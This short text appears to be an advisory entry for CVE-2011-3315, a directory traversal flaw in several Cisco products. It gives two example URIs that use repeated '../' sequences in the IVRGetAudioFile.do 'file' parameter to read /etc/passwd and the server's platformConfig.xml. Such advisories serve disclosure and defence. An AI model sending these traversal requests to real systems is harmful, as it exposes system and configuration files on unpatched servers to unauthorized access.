Multiple Cisco Products 'file' Parameter (CVE-2011-3315) Directory Traversal Vulnerability
An attacker can exploit this issue through a browser. The following example URIs are available: http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../usr/local/platform/conf/platformConfig.xml |
Privacy Statement |